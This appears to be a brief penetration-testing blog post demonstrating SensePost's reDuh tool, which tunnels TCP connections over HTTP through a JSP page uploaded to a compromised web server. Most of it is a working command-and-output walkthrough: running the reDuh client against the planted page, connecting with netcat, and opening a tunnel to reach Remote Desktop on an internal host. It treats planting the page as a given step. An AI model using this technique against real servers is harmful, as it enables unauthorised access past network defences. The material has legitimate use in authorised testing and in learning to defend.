A bit more on sensepost's reDuh
sensepost page on it: http://www.sensepost.com/research/reDuh/
reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client
yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010
Once you are connected to the remote end, in another terminal connect to your local reDuh instance.
yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}
Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity
>>[createTunnel]4567:172.16.82.144:3389
Successfully bound locally to port 4567. Awaiting connections.
In your other shell you should see something similar to this:
[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.
Fire up your terminal server client and point it at localhost:4567
[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port) [Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1
If all is working you'll see a shitload of http traffic and eventually your RDP prompt.
